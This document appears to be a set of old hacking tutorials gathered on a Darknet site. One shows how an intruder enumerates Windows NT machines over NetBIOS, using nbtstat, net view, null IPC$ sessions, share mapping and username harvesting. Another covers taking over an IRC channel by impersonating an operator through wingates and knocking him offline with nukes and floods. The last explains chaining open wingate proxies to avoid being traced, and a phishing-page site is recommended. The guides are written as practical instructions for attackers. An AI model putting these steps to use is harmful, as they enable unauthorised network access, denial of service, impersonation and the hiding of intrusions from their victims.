The rest is up to you, my friend. By the way, if Hotmail finds a way to make this exploit null and void, please don’t mail me, as I probably already know. Just keep looking for the next big exploit, and then when you’ve found it, you may tell me.

Terms Defined

(1) Bugtraq – A mailing list where people publicize holes and exploits in various softwares. I highly suggest that you subscribe at http://www.securityfocus.com.
(2) Exploit – Webster’s dictionary sez: ” exploit (eks’ploit’) – an act remarkable for brilliance or daring; bold deed”. Wow. Think of that the next time you steal someone’s ICQ password.
(3) alert() function – A function built into the Javascript language that brings up a rectangle box with the message passed to the alert() function in it. Note: alert(’message goes here’)
(4) Javascript – A scripting language built into most popular browsers that gives much greater control over web page content than HTML alone (chicks dig pages with javascript 2 to 1 over standard HTML!).
(5) ASCII – A standard for characters on and beyond the normal keyboard.
(6) Filtering – A way to ‘catch and detain’ certain text or commands. Hotmail, for example, filters for the “javascript” text.

Some URLs

(1) http://www.htmlgoodies.com – they have some javascript tutorials if you wanna learn javascript.
(2) http://come.to/the-lamer – they have some fake hotmail pages that will make you think you were logged out for some reason and ask you to input your password. They also have some tutorials on how to use these pages, etc’ etc’ etc’.

From Blacksun – Updated by Darknet

This article is being written in a procedural manner. I have approached it much like an intruder would actually approach a network penetration. Most of the techniques discussed in this text are rather easy to accomplish once one understands how and why something is being done.

When targetting a given network, the first thing an intruder would do, would be to portscan the remote machine or network. A lot of information can be gathered by a simple port scan but what the intruder is looking for is an open port 139 – the Default NetBios port. It’s surprising how methodical an attack can become based on the open ports of a target machine. You should understand that it is the norm for an NT machine to display different open ports than a Unix machine.

Intruders learn to view a portscan and tell wether it is an NT or Unix machine with fairly accurate results. Obviously there are some exceptions to this, but generally it can be done.

Recently, several tools have been released to fingerprint a machine remotely, but this functionality has not been made available for NT.

Information gathering with NetBIOS can be a fairly easy thing to accomplish, albeit a bit time consuming. NetBIOS is generally considered a bulky protocol with high overhead and tends to be slow, which is where the consumption of time comes in.

If the portscan reports that port 139 is open on the target machine, a natural process follows. The first step is to issue an NBTSTAT command.

The NBTSTAT command can be used to query network machines concerning NetBIOS information. It can also be useful for purging the NetBIOS cache and preloading the LMHOSTS file. This one command can be extremely useful when performing security audits.

Interpretation the information can reveal more than one might think.

Usage: nbtstat [-a RemoteName] [-A IP_address] [-c] [-n] [-R] [-r] [-S] [-s] [interval]

Switches
   -a    Lists the remote computer's name table given its host name.
   -A    Lists the remote computer's name table given its IP address.
   -c    Lists the remote name cache including the IP addresses.
   -n    Lists local NetBIOS names.
   -r    Lists names resolved by broadcast and via WINS.
   -R    Purges and reloads the remote cache name table.
   -S    Lists sessions table with the destination IP addresses.
   -s    Lists sessions table conversions.

The column headings generated by NBTSTAT have the following meanings:

Input
     Number of bytes received.
Output
     Number of bytes sent.
In/Out
     Whether the connection is from the computer (outbound)
     or from another system to the local computer (inbound).
Life
     The remaining time that a name table cache entry will "live"
     before your computer purges it.
Local Name
     The local NetBIOS name given to the connection.
Remote Host
     The name or IP address of the remote host.
Type
     A name can have one of two types: unique or group.
     The last byte of the 16 character NetBIOS name often
     means something because the same name can be present
     multiple times on the same computer. This shows the last
     byte of the name converted into hex.
State
     Your NetBIOS connections will be shown in one of the
     following "states": 

State                   Meaning

Accepting         An incoming connection is in process.

Associated        The endpoint for a connection has been created
                      and your computer has associated it with an IP
                      address.

Connected         This is a good state! It means you're connected
                       to the remote resource.

Connecting        Your session is trying to resolve the name-to-IP
                       address mapping of the destination resource.

Disconnected      Your computer requested a disconnect, and it is
                        waiting for the remote computer to do so.

Disconnecting     Your connection is ending.

Idle              The remote computer has been opened in the current
                   session, but is currently not accepting connections.

Inbound        	  An inbound session is trying to connect.

Listening      	  The remote computer is available.

Outbound       	  Your session is creating the TCP connection.

Reconnecting      If your connection failed on the first attempt,
                        it will display this state as it tries to reconnect.

Here is a sample NBTSTAT response of my NT Box:

C:\>nbtstat -A 195.171.236.139

       NetBIOS Remote Machine Name Table

   Name               Type         Status
---------------------------------------------
MR_B10NDE      <00>  UNIQUE      Registered
WINSEKURE LABS <00>  GROUP       Registered
MR_B10NDE      <03>  UNIQUE      Registered
MR_B10NDE      <20>  UNIQUE      Registered
WINSEKURE LABS <1E>  GROUP       Registered

MAC Address = 44-45-53-54-00-00

Using the table below, what can you learn about the machine?

Name			Number		Type		Usage
=========================================================================
	00		U		Workstation Service
	01		U		Messenger Service
<\\_MSBROWSE_>	01		G		Master Browser
	03		U		Messenger Service
	06		U		RAS Server Service
	1F		U		NetDDE Service
	20		U		File Server Service
	21		U		RAS Client Service
	22		U		Exchange Interchange
	23		U		Exchange Store
	24		U		Exchange Directory
	30		U		Modem Sharing Server Service
	31		U		Modem Sharing Client Service
	43		U		SMS Client Remote Control
	44		U		SMS Admin Remote Control Tool
	45		U		SMS Client Remote Chat
	46		U		SMS Client Remote Transfer
	4C		U		DEC Pathworks TCPIP Service
	52		U		DEC Pathworks TCPIP Service
	87		U		Exchange MTA
	6A		U		Exchange IMC
	BE		U		Network Monitor Agent
	BF		U		Network Monitor Apps
	03		U		Messenger Service
	00		G		Domain Name
	1B		U		Domain Master Browser
	1C		G		Domain Controllers
	1D		U 		Master Browser
	1E		G		Browser Service Elections
	1C		G		Internet Information Server
 00		U		Internet Information Server
	[2B]		U		Lotus Notes Server
IRISMULTICAST	[2F]		G		Lotus Notes
IRISNAMESERVER	[33]		G		Lotus Notes
Forte_$ND800ZA	[20]		U		DCA Irmalan Gateway Service

Unique (U): The name may have only one IP address assigned to it. On a network device, multiple occurences of a single name may appear to be registered, but the suffix will be unique, making the entire name unique.

Group (G): A normal group; the single name may exist with many IP addresses.

Multihomed (M): The name is unique, but due to multiple network interfaces on the same computer, this configuration is necessary to permit the registration. Maximum number of addresses is 25.

Internet Group (I): This is a special configuration of the group name used to manage WinNT domain names.

Domain Name (D): New in NT 4.0.

An intruder could use the table above and the output from an nbtstat against your machines to begin gathering information about them. With this information an intruder can tell, to an extent, what services are running on the target machine and sometimes what software packages have been installed. Traditionally, every service or major software package comes with it’s share of vulnerabilities, so this type of information is certainly useful to an intruder.

The next step for an intruder would be to try and list the open shares on the given computer, using the net view command, Here is an example of the net view command used against my box with the open shares C:\ and C:\MP3S\

C:\>net view \\195.171.236.139
Shared resources at \\195.171.236.139

Sharename    Type         Comment
-----------------------------------------------------------------
C            Disk         Drive C:\
MP3S         Disk         My collection of MP3s
The command was completed successfully.

This information would give the intruder a list of shares which he would then use in conjunction with the net use command, a command used to enable a computer to map a share to it’s local drive, below is an example of how an intruder would map the C Share to a local G: drive which he could then browse:

C:\>net use G: \\195.171.236.139\C
The command was completed successfully.

C:\>G:

G:\>

However, If the intruder was targetting a large network rather than a single remote computer, the next logical step would be to glean possible usernames from the remote machine.

A network login consists of two parts, a username and a password. Once an intruder has what he knows to be a valid list of usernames, he has half of several valid logins.

Now, using the nbtstat command, the intruder can get the login name of anyone logged on locally at that machine. In the results from the nbtstat command, entries with the <03> identifier are usernames or computernames. Gleaning usernames can also be accomplished through a null IPC session and the SID tools

The IPC$ (Inter-Process Communication) share is a standard hidden share on an NT machine which is mainly used for server to server communication. NT machines were designed to connect to each other and obtain different types of necessary information through this share. As with many design features in any operating system, intruders have learned to use this feature for their own purposes. By connecting to this share an intruder has, for all technical purposes, a valid connection to your server. By connecting to this share as null, the intruder has been able to establish this connection without providing it with credentials.

To connect to the IPC$ share as null, an intruder would issue the following command from a command prompt:

c:\>net use \\[ip address of target machine]\ipc$ "" /user:""

If the connection is successful, the intruder could do a number of things other than gleaning a user list, but lets start with that first. As mentioned earlier, this technique requires a null IPC session and the SID tools. Written by Evgenii Rudnyi, the SID tools come in two different parts, User2sid and Sid2user. User2sid will take an account name or group and give you the corresponding SID. Sid2user will take a SID and give you the name of the corresponding user or group. As a stand alone tool, this process is manual and very time consuming. Userlist.pl is a perl script written by Mnemonix that will automate this process of SID grinding, which drastically cuts down on the time it would take an intruder to glean this information.

At this point, the intruder knows what services are running on the remote machine, which major software packages have been installed (within limits), and has a list of valid usernames and groups for that machine. Although this may seem like a ton of information for an outsider to have about your network, the null IPC session has opened other venues for information gathering. The Rhino9 team has been able to retrieve the entire native security policy for the remote machine.

Such things as account lockout, minimum password length, password age cycling, password uniqueness settings as well as every user, the groups they belong to and the individual domain restrictions for that user – all through a null IPC session. This information gathering ability will appear in Rhino9’s soon to be released Leviathan tool. Some of the tools available now that can be used to gather more information via the IPC null session will be discussed below.

With the null IPC session, an intruder could also obtain a list of network shares that may not otherwise be obtainable. For obvious reasons, an intruder would like to know what network shares you have available on your machines. For this information gathering, the standard net view command is used, as follows:

c:\>net view \\[ip address of remote machine]

Depending on the security policy of the target machine, this list may or may not be denied. Take the example below (ip address has been left out for obvious reasons):

C:\>net view \\0.0.0.0
System error 5 has occurred.

Access is denied.

C:\>net use \\0.0.0.0\ipc$ "" /user:""
The command completed successfully.

C:\>net view \\0.0.0.0
Shared resources at \\0.0.0.0

Share name   Type         Used as  Comment

---------------------------------------------------------------------
Accelerator  Disk                  Agent Accelerator share for Seagate backup
Inetpub      Disk
mirc         Disk
NETLOGON     Disk                  Logon server share
www_pages    Disk
The command completed successfully.

As you can see, the list of shares on that server was not available until after the IPC null session had been established. At this point you may begin to realize just how dangerous this IPC connection can be, but the IPC techniques that are known to us now are actually very basic. The possibilities that are presented with the IPC share are just beginning to be explored.

Once this list of shares had been given, the intruder could then proceed to issue the net use commands as described above.

By By Mr. B10nde – Updated by Darknet

Tools needed

An IRC script that can do mass deops quickly and easily (preferibly one that lets you press an F# (function) key to do mass deops, or one that automatically mass deops once you gain ops). You don’t want to have to start going through popup menus since you have to do this quickly.

An IRC script that can do mass CTCP versioning. I’ll explain later.

A wingate scanner. These aren’t too hard to find. Check http://packetstorm.linuxsecurity.com/wingate-scanner/

A few ‘war’ programs to exploit irc clients, nuke, flood, etc. When I say flood, I don’t mean like a ping flood in mIRC, I mean like a real ICMP flooder. Try to find Final Fortune, it’s a program I made myself… very effective.

A lot of patience.

A brain.

Process

Find a channel you want to takeover. This method will NOT work on Dalnet or any other networks with anything like ChanServ. Also, this won’t work if all of the ops in the channel are bots (unless they’re VERY badly programmed). OK, so once you’re in the channel, do a Version CTCP on all of the ops in there. Look for exploitable scripts (some versions of ircN, mIRC 5.3x, mIRC 5.4, etc.). Now, let’s say you find someone with nick ‘DumbOP’ and he’s using a script that you know you can exploit and disconnect him from IRC (but don’t crash him yet!).

/dns DumbOP to find his IP. Now take your handy wingate scanner. Plug in his IP and search for a similar one with the scanner. If you can’t find one in the same Class C range, try Class B if you have to, but make sure it resolves to something close to DumbOP’s IP.

Good, so now you have a wingate IP similar to DumbOP’s. If you couldn’t find an IP close to his, try this with another op with an exploitable script. Do a /whois DumbOP to find the IRC server he’s on and his ident (the thing before the @ip). So now that you have the wingate IP, what do you do with it? I’ll assume you never wingated before, and I’ll explain how to do it with mIRC. For
the example, let’s say the wingate IP is 1.2.3.4, DumbOP’s ident is ‘opident’, and DumbOP’s irc server is ‘irc.server.net’.

Open a new instance of mIRC, and in the status window, do the following:

/server 1.2.3.4 23

You’ll see it say “WinGate>NICK (some nick)”

Right after you see this, type:

/quote irc.server.net 6667

You’ll probably then see something like

“Connecting to host USER…Host name lookup for USER failedirc.server.net 6667
Connecting to host irc.server.net…connected”

You might see more than this, you might see less. The important thing to watch for is:

” -1.2.3.4- *** Looking up your hostname…
-1.2.3.4- *** Checking Ident
-1.2.3.4- *** Found your hostname
-1.2.3.4- *** Got Ident response ”

Once you see that, type:

/quote user opident opident opident opident
/quote nick DumbOP1

You don’t have to use ‘DumbOP1′, just use any temporary nick you want. Also, you can use ‘/raw’ instead of ‘/quote’ if you wish.

If you did everything correctly, you’ll see the MOTD for the irc server, and you’ll be connected. If by chance 1.2.3.4 is k-lined from irc.server.net, you’ll have to go through the whole process again with a different server. This makes your “spoofing” (it’s not REALLY spoofing) attempt less realistic looking, but if you have to use a different server, then do it.

Once you’re online, everything works like normal. Do a /whois DumbOP1 to see your info. It should be close to DumbOP’s.

You’re halfway there! The next thing to do (not necessary, but recommended) is to try to find out some info on DumbOP. I recommend trying “nbtstat -A ” at the dos prompt, that might provide you with a name or two if you’re lucky. This is just some useful information that might
come in handy. Also, try searching ICQ for his nick and check his info, you might find good stuff in there.

The next step is to disconnect DumbOP from IRC. Either use an exploit, or nuke him (Click is sometimes useful (if you don’t know what Click is, it’s a program made by Rhad to have an IRC server ‘nuke’ a person… it sometimes works)), or ICMP flood him. Do anything you have to to disconnect him. By the way, you should have your original IRC session still open, with your
wingated IRC session running as a different instance of mIRC (you should have 2 ‘versions’ of mIRC running at the same time now, one with your original nick, info, etc., and the other with the DumbOP1 stuff). While you’re attacking DumbOP, monitor the channel with your original session of mIRC and wait for DumbOP to disconnect. Immediately after you see that, rename DumbOP1 to DumbOP (/nick DumbOP) and join the channel! Don’t say anything! If you’re lucky, a stupid op will op you. Then mass deop. If nothing happens for about 5 or 6 minutes, mass message the ops, saying something like “what happened? why am I not opped?”. You might get into a conversation. Remember to keep calm, and talk like an op. Don’t freak out and demand for them to op you. The “useful information” might come in handy now. Often the ops will tell you to get ops from the bots. Just say something like you’re desynched from the bots because of your ping timeout.

If your impersonation is good enough, 9/10 times they’ll op you. Like I said before, IMMEDIATELY do a mass deop. If possible, bring AT LEAST two bots (real bots, not just simple clones) into the channel to hold it and protect it.

If you followed all these steps thoroughly, you should be able to takeover most channels as long as there are at least 2 human ops (1 of which you’ll be ’spoofing’, the other you’ll be messaging to op you).

Good luck and have fun!

Originally by St0rmer from EFNet, updated by Darknet.

This tutorial is an attempt to help you re-route all internet winsock applications in ms windows trough a socks chain, thus making your connections much more anonymous.

Theory

The more different hops you make your data jump, the more difficult it will be to trace it back. take this route for example:

you –> socks1 –> socks2 –> socks3 –> … –> socksx –> target

People who want to trace you will have to contact x persons to ask their them for their logs. chances are one of them didn’t log… and if they logged, the ip seen by each host/socks is the ip of the previous host/socks in the chain.

This works for:

• icq-like tools
• ftp clients
• mail clients
• telnet clients
• portscanners
• (just about anything that uses the internet)

It doesn’t work on most irc servers since they often check for open wingates
and proxies.

Now let’s do it

1) First you need to find some boxes running wingate, we look for wingates since the default installation of wingate includes a non-logging socks server on port 1080

Visit http://www.samair.ru/proxy/socks.htm or http://www.proxyleecher.com/socks.php for some wide-known wingate ips, or even better: you could try to find some yourself.

To do this, i would suggest you use ‘proxy hunter’, available for download at http://www.proxys4all.com/tools.shtml be sure to look for wingates (port 23) and not for socks, as we only want wingate socks.

You could also use wingatescan, available for download at http://packetstormsecurity.org/wingate-scanner/

Speed is very important since we will be using multiple socks, and we don’t want our programs to time out. with the klever dipstick tool, you can find out which are the fastest ones. (get the klever dipstick program at http://klever.net/kin/static/dipstick.exe)

Just fire off Dipstick. Rightclick in the small green rectangular and choose Show main window. To import a list of wingates, just click on Advanced, choose Import List and select your file.

You can also manually ping a simple host by clicking on Manual Ping. Use those wingates with the smallest average time. *duh*

2) Second, check if the wingates from the list are actually running

There are a lot of programs that can help you with this.

3) Third, install a program that will intercept all outgoing networking calls.

I use the great tool sockscap for this purpose. you can get it at http://www.socks.permeo.com/Download/SocksCapDownload/index.asp

In the setting, enter this as socks server : 127.0.0.1 port 8000. Click on ’socks version 5′. click ‘resolve all names remotely’. Uncheck ’supported authentication’.

In the main window, choose new and then browse to create a shortcut for the internet client you want to give socks support.

Repeat this step for every program you want.

4) Install SocksChain

Download it at http://www.ufasoft.com/socks

In the service menu, click on new. enter ‘Chain’ as name and ‘8000′ as port to accept connections on.

Click on new and fill in the ips of the fastest wingates you found, but this time, use port 1080 for this (and not the port 23)

Using the ‘<' and '>‘, you can add and remove socks. be sure to test all socks one by one before adding them all to the list in once, because if one of them is bad, you chain will not work and you will not be able to locate the bad socks in the chain.

If all of them seem to work, you use the ‘<' key to add them all (mind speed problems. 4 or less is fine. i think 10 or 13 is the limit put by tcp/ip)

Testing your anonymous setup

To check what socks your computer is connecting to, you can use x-ploiters totostat (http://tucows.mundofree.com/preview/7534.html). look for connections to port 1080, the remote ip found there should be the first ip found in your chain in sockschain.

use the shortcut in sockscap that points to your browser, and connect to http://cavency.virtualave.net/cgi-bin/env.cgi or
http://www.junkbuster.com/cgi-bin/show_http_headers

Use your shortcut in sockcap to start your telnet client then telnet to ukanaix.cc.ukans.edu

In all the above cases, the remote server should show you the ip of the last server in the sockschain. if you look at the sockschain program while surfing you should see the chain being built up.

Some final remarks

Never use internet explorer to do tricky stuff as it might reveal your ip. my personal favorite browser is opera 4.0 (http://www.opera.com/), Darknet recommends Firefox.

To avoid info being sent out, we could install another proxy between the sockscap and the sockschainer proxy that would filter out those things. A4proxy is an example of a proxy capable of doing such things or Proximitron which Darknet uses.

Remember, if you want to do the real stuff, better switch to Linux like Ubuntu.

Written by Zoa_chien – EFNet – Updated with current info, lists and URL’s by Darknet.

Digg This Article